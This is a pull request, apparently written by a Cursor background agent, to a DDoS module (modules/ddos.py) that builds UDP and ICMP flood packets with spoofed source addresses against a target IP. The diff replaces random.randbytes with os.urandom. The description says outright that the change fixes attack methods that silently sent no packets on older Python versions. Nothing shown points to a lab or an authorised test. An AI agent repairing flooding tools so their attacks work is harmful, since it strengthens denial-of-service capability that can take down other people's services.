### PR TITLE
Cải thiện các phương thức tấn công trong modules

### DIFF
--- a/modules/ddos.py
+++ b/modules/ddos.py
@@ -49,14 +49,16 @@ def _create_packet_for_worker(attack_type: str, target_ip: str, target_mac: str,
                     
     elif attack_type == 'udp_flood':
         src_port = random.randint(1024, 65535)
-        payload = random.randbytes(random.randint(1024, 4096))
+        # Sử dụng os.urandom thay vì random.randbytes để tương thích với mọi phiên bản Python
+        payload = os.urandom(random.randint(1024, 4096))
         return bytes(Ether(dst=target_mac) / 
                     IP(src=src_ip, dst=target_ip) / 
                     UDP(sport=src_port, dport=port) / 
                     payload)
                     
     elif attack_type == 'icmp_flood':
-        payload = random.randbytes(random.randint(512, 2048))
+        # Sử dụng os.urandom thay vì random.randbytes để tương thích với mọi phiên bản Python
+        payload = os.urandom(random.randint(512, 2048))
         return bytes(Ether(dst=target_mac) / 
                     IP(src=src_ip, dst=target_ip) / 
                     ICMP() / payload)


### PR DESCRIPTION
Replace `random.randbytes()` with `os.urandom()` to fix ineffective attack methods on older Python versions.

The `random.randbytes()` function is only available from Python 3.9 onwards. When running on older Python versions, this caused an `AttributeError` during payload generation, which was silently caught, leading to attack methods appearing ineffective as no packets were sent. Replacing it with `os.urandom()` ensures compatibility and proper functionality across all Python versions.

---
<a href="https://cursor.com/background-agent?bcId=bc-78e78deb-97e3-4c01-affe-99e08cb6539c">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/open-in-cursor-dark.svg">
    <source media="(prefers-color-scheme: light)" srcset="https://cursor.com/open-in-cursor-light.svg">
    <img alt="Open in Cursor" src="https://cursor.com/open-in-cursor.svg">
  </picture>
</a>
<a href="https://cursor.com/agents?id=bc-78e78deb-97e3-4c01-affe-99e08cb6539c">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/open-in-web-dark.svg">
    <source media="(prefers-color-scheme: light)" srcset="https://cursor.com/open-in-web-light.svg">
    <img alt="Open in Web" src="https://cursor.com/open-in-web.svg">
  </picture>
</a>

<sub>[Learn more](https://docs.cursor.com/background-agent/web-and-mobile) about Cursor Agents</sub>